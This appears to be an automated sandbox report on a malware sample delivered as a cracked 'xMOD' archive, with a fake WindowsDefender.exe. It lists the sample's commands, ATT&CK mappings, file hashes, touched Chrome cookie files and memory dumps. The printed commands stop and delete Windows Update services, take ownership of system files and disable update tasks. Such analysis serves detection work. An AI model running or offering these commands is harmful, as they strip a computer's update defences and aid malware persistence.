"\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:4364

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
1⤵
PID:4100

C:\Windows\system32\sc.exe
sc stop wuauserv
1⤵
PID:5260

C:\Windows\system32\sc.exe
sc stop dosvc
1⤵
PID:5240

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
1⤵
- Modifies registry key
PID:3992

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3292

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3400

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:5136

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
1⤵
PID:4136

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
1⤵
PID:5924

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
1⤵
PID:5388

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
1⤵
PID:5040

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
1⤵
PID:5652

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
1⤵
PID:4624

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
1⤵
PID:4156

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:4920

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:3684

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:4288

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
1⤵
- Modifies registry key
PID:4992

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
1⤵
- Modifies registry key
PID:3780

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
1⤵
- Modifies registry key
PID:2268

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
1⤵
- Modifies registry key
PID:5220

C:\Windows\system32\sc.exe
sc stop bits
1⤵
PID:5212

C:\Windows\system32\sc.exe
sc stop UsoSvc
1⤵
PID:4320

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows\services.exe
Filesize
2.0MB

MD5
34a91a205cbdf47dea9feac116611310

SHA1
e41c185ab80f0e159daf2b81e817daff16f2eda6

SHA256
dba6bf07d0b8944d8c58367d86c55ece1a4687e8a2b7be5d700f6d508c72a37c

SHA512
8826cb3d89d03750da3ffaa4eccfb6995545b54fbb3615f15d2114f1eea6bbb1b330ec1d209d95596e132f070efda7fb0285e621f639c1cd5fd0164a28f7ae30

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies
Filesize
56KB

MD5
db976d216180252947220be18470ca36

SHA1
5bf37b90e102587eacc3ecaec2c4bae20289f090

SHA256
dc66e6f2e478ec3bbfd8edb3a216177758b4e20ff8494697c4ae726c78f4b6a3

SHA512
194f718117245cd16feb1f669cd76f780212bb4353fc53aadb554ec58ac4320585c14476b4dc1609e99d62b461a162769ed141b2a55d45d1feb463244948c3c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
189KB

MD5
9ab18cf2a11a594ed2edc9e689dc43d7

SHA1
119ab095b6acf0c470e4b92bb320231efa520256

SHA256
6b4cd0a18d44a21e4d4f0a3cc4e7362e6b2c4bfe4d4513a5b5f0979966f038df

SHA512
269f9c501e7686da710525d79ff6dc9646808be454669e024b0d38b03f34268617035bb2e2b2568e14994a201438775ce307cad58674bb6bac9635c5b752e25f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO0E7DCB17\Loader.exe
Filesize
1.3MB

MD5
6f20d2168a9a0ab5eb17d69c0b9c057a

SHA1
64d19ccab5b0beb90ea1504799fc257d0f2e95c8

SHA256
157daf85b76555fb1d668880c0d436d1dc0b914da3e2e1057ceb6f2086574915

SHA512
107a00df2dd5f75d73f9c5b852d079d26ffab2b7329963357c3c2d2234498787aa1d349365f2c93235e7287ace5a3f4a54b5314b8365e6a04b935f7bdda6be63

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO0E7DCB17\Loader.exe
Filesize
1.3MB

MD5
6f20d2168a9a0ab5eb17d69c0b9c057a

SHA1
64d19ccab5b0beb90ea1504799fc257d0f2e95c8

SHA256
157daf85b76555fb1d668880c0d436d1dc0b914da3e2e1057ceb6f2086574915

SHA512
107a00df2dd5f75d73f9c5b852d079d26ffab2b7329963357c3c2d2234498787aa1d349365f2c93235e7287ace5a3f4a54b5314b8365e6a04b935f7bdda6be63

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
Filesize
2.0MB

MD5
34a91a205cbdf47dea9feac116611310

SHA1
e41c185ab80f0e159daf2b81e817daff16f2eda6

SHA256
dba6bf07d0b8944d8c58367d86c55ece1a4687e8a2b7be5d700f6d508c72a37c

SHA512
8826cb3d89d03750da3ffaa4eccfb6995545b54fbb3615f15d2114f1eea6bbb1b330ec1d209d95596e132f070efda7fb0285e621f639c1cd5fd0164a28f7ae30

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
Filesize
2.0MB

MD5
34a91a205cbdf47dea9feac116611310

SHA1
e41c185ab80f0e159daf2b81e817daff16f2eda6

SHA256
dba6bf07d0b8944d8c58367d86c55ece1a4687e8a2b7be5d700f6d508c72a37c

SHA512
8826cb3d89d03750da3ffaa4eccfb6995545b54fbb3615f15d2114f1eea6bbb1b330ec1d209d95596e132f070efda7fb0285e621f639c1cd5fd0164a28f7ae30

Download Submit
C:\Users\Admin\Downloads\xMOD v4.7 (PASS 123).rar
Filesize
1.7MB

MD5
fadee4c0867a3f3a421f823719a4c650

SHA1
219ad2887a51b5b5635a257de7eb8d72532b4d9d

SHA256
5de6d3b09065c6354facd498284eaeaf7c1213b5a2dad3a09d22bc2732af0cde

SHA512
988756a1c0e981348e15c8be111872798af9001c1a83338bd0d05e1368e8b10017b8102709030fa89e311d5ed1ccb3bb79b8e9b62df5f630998bca6b5505625b

Download Submit
\??\pipe\crashpad_2768_GZDGWUHGQBKSYJZQ
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/8-178-0x0000000000000000-mapping.dmp

Download
memory/392-191-0x0000000000000000-mapping.dmp

Download
memory/632-161-0x000001E28C280000-0x000001E28C45D000-memory.dmp

Filesize
1.9MB

Download
memory/632-162-0x000001E28E090000-0x000001E28EB51000-memory.dmp

Filesize
10.8MB

Download
memory/852-189-0x0000000000000000-mapping.dmp

Download
memory/1492-193-0x0000000000000000-mapping.dmp

Download
memory/1876-176-0x0000000000000000-mapping.dmp

Download
memory/1928-132-0x0000000000000000-mapping.dmp

Download
memory/2040-177-0x0000000000000000-mapping.dmp

Download
memory/2180-185-0x0000000000000000-mapping.dmp

Download
memory/2268-183-0x0000000000000000-mapping.dmp

Download
memory/2268-213-0x0000000000000000-mapping.dmp

Download
memory/2892-184-0x0000000000000000-mapping.dmp

Download
memory/3292-221-0x0000000000000000-mapping.dmp

Download
memory/3400-220-0x0000000000000000-mapping.dmp

Download
memory/3684-225-0x0000000000000000-mapping.dmp

Download
memory/3684-188-0x0000000000000000-mapping.dmp

Download
memory/3780-181-0x0000000000000000-mapping.dmp

Download
memory/3780-214-0x0000000000000000-mapping.dmp

Download
memory/3952-195-0x000001F8A9430000-0x000001F8A9EF1000-memory.dmp

Filesize
10.8MB

Download
memory/3952-222-0x000001F8C2A00000-0x000001F8C2A12000-memory.dmp

Filesize
72KB

Download
memory/3992-212-0x0000000000000000-mapping.dmp

Download
memory/3992-182-0x0000000000000000-mapping.dmp

Download
memory/4100-207-0x0000000000000000-mapping.dmp

Download
memory/4136-231-0x0000000000000000-mapping.dmp

Download
memory/4152-190-0x0000000000000000-mapping.dmp

Download
memory/4156-227-0x0000000000000000-mapping.dmp

Download
memory/4288-187-0x0000000000000000-mapping.dmp

Download
memory/4288-224-0x0000000000000000-mapping.dmp

Download
memory/4320-206-0x0000000000000000-mapping.dmp

Download
memory/4364-205-0x0000000000000000-mapping.dmp

Download
memory/4412-186-0x0000000000000000-mapping.dmp

Download
memory/4624-228-0x0000000000000000-mapping.dmp

Download
memory/4920-226-0x0000000000000000-mapping.dmp

Download
memory/4992-215-0x0000000000000000-mapping.dmp

Download
memory/5000-165-0x0000000000000000-mapping.dmp

Download
memory/5040-233-0x0000000000000000-mapping.dmp

Download
memory/5060-172-0x0000000000000000-mapping.dmp

Download
memory/5084-175-0x0000000000000000-mapping.dmp

Download
memory/5116-217-0x0000000000401BEA-mapping.dmp

Download
memory/5116-216-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/5116-219-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/5124-167-0x0000000000000000-mapping.dmp

Download
memory/5136-223-0x0000000000000000-mapping.dmp

Download
memory/5200-166-0x0000000000000000-mapping.dmp

Download
memory/5212-209-0x0000000000000000-mapping.dmp

Download
memory/5220-211-0x0000000000000000-mapping.dmp

Download
memory/5228-180-0x0000000000000000-mapping.dmp

Download
memory/5240-210-0x0000000000000000-mapping.dmp

Download
memory/5260-208-0x0000000000000000-mapping.dmp

Download
memory/5264-149-0x0000000006420000-0x0000000006486000-memory.dmp

Filesize
408KB

Download
memory/5264-146-0x0000000005F80000-0x0000000006012000-memory.dmp

Filesize
584KB

Download
memory/5264-154-0x0000000006ED0000-0x0000000006F20000-memory.dmp

Filesize
320KB

Download
memory/5264-143-0x0000000005530000-0x000000000563A000-memory.dmp

Filesize
1.0MB

Download
memory/5264-145-0x0000000006530000-0x0000000006AD4000-memory.dmp

Filesize
5.6MB

Download
memory/5264-142-0x0000000005400000-0x0000000005412000-memory.dmp

Filesize
72KB

Download
memory/5264-141-0x0000000005960000-0x0000000005F78000-memory.dmp

Filesize
6.1MB

Download
memory/5264-135-0x0000000000000000-mapping.dmp

Download
memory/5264-147-0x00000000058D0000-0x0000000005946000-memory.dmp

Filesize
472KB

Download
memory/5264-148-0x00000000060A0000-0x00000000060BE000-memory.dmp

Filesize
120KB

Download
memory/5264-144-0x0000000005480000-0x00000000054BC000-memory.dmp

Filesize
240KB

Download
memory/5264-136-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/5264-152-0x00000000076B0000-0x0000000007BDC000-memory.dmp

Filesize
5.2MB

Download
memory/5264-151-0x0000000006FB0000-0x0000000007172000-memory.dmp

Filesize
1.8MB

Download
memory/5320-179-0x0000000000000000-mapping.dmp

Download
memory/5388-232-0x0000000000000000-mapping.dmp

Download
memory/5492-163-0x000001FFA9390000-0x000001FFA9E51000-memory.dmp

Filesize
10.8MB

Download
memory/5492-160-0x000001FFA9F70000-0x000001FFA9F92000-memory.dmp

Filesize
136KB

Download
memory/5492-159-0x0000000000000000-mapping.dmp

Download
memory/5500-158-0x0000000000000000-mapping.dmp

Download
memory/5652-229-0x0000000000000000-mapping.dmp

Download
memory/5892-164-0x0000000000000000-mapping.dmp

Download
memory/5900-171-0x0000000000000000-mapping.dmp

Download
memory/5924-174-0x0000000000000000-mapping.dmp

Download
memory/5924-230-0x0000000000000000-mapping.dmp

Download
memory/5944-168-0x0000000000000000-mapping.dmp

Download
memory/5952-173-0x0000000000000000-mapping.dmp

Download
memory/5956-169-0x0000000000000000-mapping.dmp

Download
memory/5968-199-0x00000210EFD70000-0x00000210EFD8C000-memory.dmp

Filesize
112KB

Download
memory/5968-194-0x0000000000000000-mapping.dmp

Download
memory/5968-196-0x00000210EE8F0000-0x00000210EF3B1000-memory.dmp

Filesize
10.8MB

Download
memory/5968-197-0x00000210EFB20000-0x00000210EFB3C000-memory.dmp

Filesize
112KB

Download
memory/5968-198-0x00000210EFC00000-0x00000210EFC0A000-memory.dmp

Filesize
40KB

Download
memory/5968-202-0x00000210EFD60000-0x00000210EFD68000-memory.dmp

Filesize
32KB

Download
memory/5968-200-0x00000210EFD50000-0x00000210EFD5A000-memory.dmp

Filesize
40KB

Download
memory/5968-201-0x00000210EFDB0000-0x00000210EFDCA000-memory.dmp

Filesize
104KB

Download
memory/5968-203-0x00000210EFD90000-0x00000210EFD96000-memory.dmp

Filesize
24KB

Download
memory/5968-204-0x00000210EFDA0000-0x00000210EFDAA000-memory.dmp

Filesize
40KB

Download
memory/6000-155-0x0000000000000000-mapping.dmp

Download
memory/6108-170-0x0000000000000000-mapping.dmp

Download